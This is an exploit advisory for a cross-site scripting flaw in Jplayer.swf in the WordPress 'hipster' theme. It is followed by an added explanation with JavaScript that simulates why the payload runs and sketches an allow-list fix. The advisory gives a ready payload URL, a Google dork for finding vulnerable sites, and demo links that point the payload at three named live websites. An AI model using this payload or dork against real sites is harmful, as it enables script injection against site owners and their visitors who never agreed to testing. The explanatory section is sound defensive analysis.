
WordPress hipster (jplayer.swf) Cross Site Scripting vulnerability

Author: TUNISIAN CYBER, Published: 04-12-2013
X-------------------------------------------------------------X
_____ _ _ _ _ _____ _____ _____ ___ _ _ _______ _______ ___________
|_ _| | | | \ | |_ _/ ___|_ _|/ _ \ | \ | | / __ \ \ / / ___ \ ___| ___ \
| | | | | | \| | | | \ `--. | | / /_\ \| \| | | / \/\ V /| |_/ / |__ | |_/ /
| | | | | | . ` | | | `--. \ | | | _ || . ` | | | \ / | ___ \ __|| /
| | | |_| | |\ |_| |_/\__/ /_| |_| | | || |\ | | \__/\ | | | |_/ / |___| |\ \
\_/ \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/ \____/ \_/ \____/\____/\_| \_|
X-------------------------------------------------------------X


[+] Author: TUNISIAN CYBER
[+] Exploit Title: WordPress hipster (jplayer.swf) Cross Site Scripting vulnerability
[+] Date: 4-12-2013
[+] Category: WebApp
[+] Google Dork: inurl:"/wp-content/themes/moustachey"
[+] Tested on: Win7, Ubuntu 13.04


########################################################################################

Proof (the value of the jQuery parameter is used, unvalidated, as the name of the JavaScript function the SWF calls back into the page, so it executes in the origin of the site serving Jplayer.swf):

http://127.0.0.1/[Path]/wp-content/themes/hipster/assets/javascripts/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day%20TUNISIAN%20CYBER/)//
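Why this particular payload works, as an added example (not code from the advisory, from jPlayer or from the theme): Flash Player's ExternalInterface.call(name, args) runs, inside the hosting page, JavaScript of the form try { __flash__toXML(<name>(<args>)) ; } catch (e) { "<undefined/>"; }, and an affected Jplayer.swf takes <name> straight from the jQuery FlashVar. The payload closes the call and the try block, supplies its own catch, runs alert() once, and comments out the rest of the wrapper with //. The script below rebuilds that wrapper as a string and evaluates it with stand-ins for alert() and __flash__toXML(); no SWF is loaded. The SAFE_CALLBACK allow-list and the "#jquery_jplayer_1" argument are this example's assumptions, not jPlayer's actual fix.

```javascript
// Added example, not code from the advisory, jPlayer or the hipster theme.
// Models the JavaScript that Flash Player's ExternalInterface.call() injects
// into the page and shows why the advisory's ?jQuery= value executes.
'use strict';

// Vulnerable pattern: the callback name from the FlashVar is used verbatim.
// (Wrapper format is Flash Player's ExternalInterface behaviour.)
function buildWrapperVulnerable(callbackName, argJson) {
  return 'try { __flash__toXML(' + callbackName + '(' + argJson +
         ')) ; } catch (e) { "<undefined/>"; }';
}

// Hardened pattern: accept only a dotted JavaScript identifier such as
// "jQuery" or "window.jQuery". Assumed allow-list for this example.
const SAFE_CALLBACK = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;

function buildWrapperHardened(callbackName, argJson) {
  if (!SAFE_CALLBACK.test(callbackName)) {
    throw new Error('rejected ExternalInterface callback name: ' + callbackName);
  }
  return buildWrapperVulnerable(callbackName, argJson);
}

// Evaluate a wrapper the way the browser would and record every alert() call.
// `self` is a plain object here because the payload uses self.a as a
// "fire once" flag (in a real page, self is window).
function runWrapper(js) {
  const alerts = [];
  const fakeAlert = (msg) => { alerts.push(String(msg)); };
  const fakeToXML = (v) => String(v);
  const fakeSelf = {};
  const fakeJQuery = (selector) => ({ selector }); // stand-in for jQuery()
  new Function('alert', '__flash__toXML', 'self', 'jQuery', js)(
    fakeAlert, fakeToXML, fakeSelf, fakeJQuery);
  return alerts;
}

// The advisory's ?jQuery= value after URL-decoding (%20 -> space).
const ADVISORY_PAYLOAD =
  ')}catch(e){}if(!self.a)self.a=!alert(/1337day TUNISIAN CYBER/)//';

// True when `callbackName` makes the vulnerable wrapper execute an alert().
// The selector argument is constructed for this example.
function isExploitable(callbackName) {
  return runWrapper(buildWrapperVulnerable(callbackName, '"#jquery_jplayer_1"')).length > 0;
}

// Stand-alone demonstration.
function demo() {
  console.log('legit callback fires alert?  ', isExploitable('jQuery'));          // false
  console.log('advisory payload fires alert?', isExploitable(ADVISORY_PAYLOAD)); // true
  try {
    buildWrapperHardened(ADVISORY_PAYLOAD, '"#jquery_jplayer_1"');
  } catch (e) {
    console.log('hardened builder:', e.message);
  }
}

demo();
```

Because the SWF is fetched directly by URL, it is exploitable whether or not any page on the site actually embeds it; the check that matters is whether the file is reachable under the theme path, and the fix is to remove it or replace it with a build that validates the jQuery FlashVar before passing it to ExternalInterface.call().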


Demos:
http://www.oletimey.com/wp-content/themes/hipster/assets/javascripts/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day%20TUNISIAN%20CYBER/)//
http://brisbanefringe.com/wp-content/themes/hipster/assets/javascripts/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day%20TUNISIAN%20CYBER/)//
http://www.joeposa.com/wp-content/themes/hipster/assets/javascripts/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day%20TUNISIAN%20CYBER/)//

The rest can be found with the Google dork above.

./3nD
########################################################################################
